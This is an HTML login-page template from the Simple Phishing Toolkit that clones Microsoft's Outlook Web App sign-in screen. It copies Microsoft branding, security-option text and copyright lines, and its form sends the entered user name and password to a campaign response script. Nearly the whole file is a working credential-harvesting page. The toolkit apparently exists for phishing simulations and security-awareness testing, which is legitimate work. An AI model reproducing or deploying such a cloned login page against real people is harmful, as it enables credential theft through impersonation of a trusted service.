<!--
 * file:		index.htm
 * version:		3.0
 * package:		Simple Phishing Toolkit (spt)
 * component:	Outlook 2010 manual clone template
 * copyright:	Copyright (C) 2011 The SPT Project. All rights reserved.
 * license:		GNU/GPL, see license.htm.
 * 
 * This file is part of the Simple Phishing Toolkit (spt).
 * 
 * spt is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, under version 3 of the License.
 *
 * spt is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with spt.  If not, see <http://www.gnu.org/licenses/>.
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Webmail Login</title>

<style type="text/css">
p {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px;}
.p36 {font-family: Segoe UI,Helvetica,Arial,sans-serif; font-size: 36px; font-weight: bold;}
.p24 {font-family: Segoe UI,Helvetica,Arial,sans-serif; font-size: 24px;}
.p18 {font-family: Segoe UI,Helvetica,Arial,sans-serif; font-size: 18px; font-weight: bold;}
.p14 {font-family: Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px;}
.p14orng {font-family: Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px; color: #F60;}
.p12 {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 12px;}
.p12grey {font-family: Segoe UI,Helvetica,Arial,sans-serif; font-size: 12px; color: #333;}
.warn {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 12px; color: #F60;}
.super {font-size: 50%; vertical-align: text-top;}
table {
	width: 485px;
	border: 1px solid #000;
	padding: 25px;
	border-radius: 5px;
	-moz-border-radius: 5px;
	-webkit-border-radius: 5px;
	-khtml-border-radius: 5px;
	behavior:url(border-radius.htc);
	background: #fcfff4; /* Old browsers */
	background: -moz-linear-gradient(top, #fcfff4 0%, #e9e9ce 100%); /* FF3.6+ */
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#fcfff4), color-stop(100%,#e9e9ce)); /* Chrome,Safari4+ */
	background: -webkit-linear-gradient(top, #fcfff4 0%,#e9e9ce 100%); /* Chrome10+,Safari5.1+ */
	background: -o-linear-gradient(top, #fcfff4 0%,#e9e9ce 100%); /* Opera11.10+ */
	background: -ms-linear-gradient(top, #fcfff4 0%,#e9e9ce 100%); /* IE10+ */
	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fcfff4', endColorstr='#e9e9ce',GradientType=0 ); /* IE6-9 */
	background: linear-gradient(top, #fcfff4 0%,#e9e9ce 100%); /* W3C */
}
hr {border: 1px solid #CCC;}
a {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px; color: #F60; text-decoration: none;}
a:link {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px; text-decoration:none; color: #F60;}
a:visited {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px; text-decoration:none; color: #F60;}
a:hover {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px; text-decoration:none; color: #F60;}
a:active {font-family:Segoe UI,Helvetica,Arial,sans-serif; font-size: 14px; text-decoration:none; color: #F60;}
</style>

</head>
<script src="http://code.jquery.com/jquery-latest.js"></script>
<script type="text/javascript">

var IDvaluesOfEachDiv = "pubSec privSec";
// Between the quotation marks, list the id values of each div.

IDvaluesOfEachDiv = IDvaluesOfEachDiv.replace(/[,\s"']/g," ");
IDvaluesOfEachDiv = IDvaluesOfEachDiv.replace(/^\s*/,"");
IDvaluesOfEachDiv = IDvaluesOfEachDiv.replace(/\s*$/,"");
IDvaluesOfEachDiv = IDvaluesOfEachDiv.replace(/  +/g," ");
var IDlist = IDvaluesOfEachDiv.split(" ");

function ShowAllDivs() {
for(var i=0; i<IDlist.length; i++) { 
   document.getElementById(IDlist[i]).style.display = "";
   }
}

function HideAllDivs() {
for(var i=0; i<IDlist.length; i++) { 
   document.getElementById(IDlist[i]).style.display = "none";
   }
}



//-->
</script>

<script>
$(function(){
  $("input[name$='radio_group_1']").click(function(){
  var radio_value = $(this).val();
  if(radio_value=='private') {
    $("#private_text").show();
  }
  else if(radio_value=='public') {
   $("#private_text").hide();
  }
  });
 $("#private_text").hide();
});

</script>


<body>

<form name="login" action="../../campaigns/response.php" method="POST" name="logonForm" ENCTYPE="application/x-www-form-urlencoded" autocomplete="off">

<br /><br />

<table width="40%" align="center">
	<tr>
		<td colspan="2">
        	<span class="p14">Microsoft<span class="super">&copy;</span></span><br /><span class="p24">Outlook<span class="super">&copy;</span> Web App<span class="super">TM</span></span>
            <hr>
            <span class="p14">Security:</span><span class="p14orng"> ( <a href="javascript:ShowAllDivs()" ><nobr>show</nobr></a> / <a href="javascript:HideAllDivs()"><nobr>hide</nobr></a> )</span>
            <p><input id="public" type="radio" name="radio_group_1" value="public">&nbsp;&nbsp;This is a public or shared computer</p>
            <div id="pubSec" style="display:none;" class="pubSec"><span class="p12grey">Select this option if you use Outlook Webmail on a shared public or lab computer. Be sure to sign out when you've finished and close all windows to end your session.</span></div>
            <p><input id="private" type="radio" name="radio_group_1" value="private">&nbsp;&nbsp;This is a private computer</p><div id="noPrivSecWarning" class="tab"></div>
            <div id="privSec" style="display:none;"><span class="p12grey">Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</span></div>
            <div id="private_text"><p></p><span class="warn">Warning: By selecting this option, you confirm that this computer complies with your organization's security policy.  Please contact the Helpdesk for more information regarding this policy.</span></div>
            <p><input id="light" type="checkbox" onclick="$(this).is(':checked') && $('#checked').show() || $('#checked').hide();">&nbsp;&nbsp;Use the light version of Outlook Webmail</p>
            <div id="checked" style="display: none;"><span class="p12grey">The light version of Outlook Webmail includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings.</span></div>
            <p>In accessing this computer system you acknowledge your awareness of and compliance with the Legal and Privacy policies of your organization.  Unauthorized use of any computer or network resource is prohibited.</p>
            <hr>
	</tr>
	<tr>
		<td width="20%"><p><strong>User name:</strong></p></td>
		<td><input id="username" name="username" type="text"></td>
	</tr>
	<tr>
		<td width="20%"><p><strong>Password:</strong></p></td>
		<td><input id="password" name="password" type="password"></td>
	</tr>
	<tr>
		<td colspan="2" align="right"><input type="submit" value="Sign in"></td>
	</tr>
	<tr>
		<td colspan="2"><span class="p12">Connected to Microsoft Exchange.<br />&copy; 2010 Microsoft Corporation. All rights reserved.</span></td>
	</tr>
</table>

</form>


</body>
</html>
